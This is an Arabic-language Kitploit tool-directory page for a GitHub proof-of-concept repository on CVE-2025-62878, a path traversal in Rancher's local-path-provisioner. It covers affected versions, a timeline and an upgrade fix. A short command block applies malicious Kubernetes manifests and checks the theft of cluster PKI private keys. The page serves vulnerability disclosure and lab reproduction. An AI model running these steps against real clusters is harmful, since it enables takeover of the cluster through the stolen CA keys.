Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-62878 — CVE-2025-62878 | Kitploit
أدوات/GitHubGitHub/kinokopio/cve-2025-62878
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالأمن السحابةسوء التكوينالتعلم والتعليممختبرات وتدريب عملي
GitHubkinokopio/cve-2025-62878

CVE-2025-62878

CVE-2025-62878

عرض المستودع
13منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

CVE-2025-62878: ثغرة اجتياز المسار في Local Path Provisioner

نظرة عامة

العنصرالقيمة
CVE IDCVE-2025-62878
GHSA IDGHSA-jr3w-9vfr-c746
الخطورةحرجة (CVSS 10.0)
CWECWE-23 (اجتياز المسار النسبي)
المكوّن المتأثرrancher/local-path-provisioner
الإصدارات المتأثرةv0.0.27 ~ v0.0.32
الإصدارات المُصلَحةv0.0.33+

وصف الثغرة

توجد ثغرة اجتياز مسار في معامل pathPattern الخاص بـ StorageClass. يمكن لمستخدم خبيث التلاعب بـ pathPattern باستخدام عناصر مسار نسبية (مثل ../) لإنشاء PersistentVolumes تشير إلى مواقع عشوائية على العقدة المضيفة، متجاوزًا قيد الدليل الأساسي المُعدّ.

يتيح ذلك للمهاجمين:

  • الوصول إلى ملفات حساسة على المضيف (مثل /etc/kubernetes/pki/)
  • الكتابة فوق ملفات النظام الحرجة
  • تحقيق اختراق كامل للكتلة عبر سرقة المفاتيح الخاصة لشهادة Kubernetes CA

الإصدارات المتأثرة (مُتحقَّق منها)

ملاحظة: يذكر التقرير الرسمي على GitHub Advisory أن الإصدارات "< 0.0.34" متأثرة، لكن اختباراتنا تؤكد:

  • v0.0.33 مُصلَح بالفعل
  • v0.0.26 والإصدارات الأقدم غير متأثرة (ميزة pathPattern غير موجودة)
  • النطاق المتأثر الفعلي: v0.0.27 <= الإصدار <= v0.0.32

الجدول الزمني

الحدثالتاريخ
ظهور ميزة pathPattern2024-05-26 (الالتزام af85381)
أول إصدار قابل للاستغلال (v0.0.27)2024-05-29

إعادة الإنتاج

انظر دليل exploit/ للحصول على خطوات ونصوص إعادة الإنتاج التفصيلية.

بدء سريع

root@kitploit:~
# 1. Install vulnerable version
kubectl apply -f https://raw.githubusercontent.com/rancher/local-path-provisioner/v0.0.30/deploy/local-path-storage.yaml

# 2. Apply exploit
kubectl apply -f exploit/malicious-storageclass.yaml
kubectl apply -f exploit/malicious-pvc.yaml
kubectl apply -f exploit/exploit-pod.yaml

# 3. Verify exploitation
kubectl get pv -o jsonpath='{.items[0].spec.hostPath.path}'
# Output: /etc/kubernetes/pki

kubectl exec pki-exploit-pod -- ls -la /stolen-pki/
# Shows Kubernetes PKI certificates and private keys

المعالجة

قم بالترقية إلى الإصدار v0.0.33 أو أحدث:

root@kitploit:~
kubectl apply -f https://raw.githubusercontent.com/rancher/local-path-provisioner/v0.0.33/deploy/local-path-storage.yaml

المراجع

  • نشرة GitHub الأمنية GHSA-jr3w-9vfr-c746
  • الالتزام المُصحِّح 1ed6b54
  • التزام ميزة pathPattern af85381
تنزيل الأداة
الإصدارتاريخ الإصداردعم pathPatternقابلية الاستغلال
v0.0.262023-12-03لاآمن (الميزة غير موجودة)
v0.0.272024-05-29نعمقابل للاستغلال
v0.0.282024-06-19نعمقابل للاستغلال
v0.0.292024-09-03نعمقابل للاستغلال
v0.0.302024-10-07نعمقابل للاستغلال
v0.0.312025-01-24نعمقابل للاستغلال
v0.0.322025-07-31نعمقابل للاستغلال
v0.0.332025-12-25نعممُصلَح
v0.0.342026-01-06نعممُصلَح
الالتزام المُصحِّح2025-12-24 (الالتزام 1ed6b54)
أول إصدار مُصلَح (v0.0.33)2025-12-25
نشر CVE2026-02-04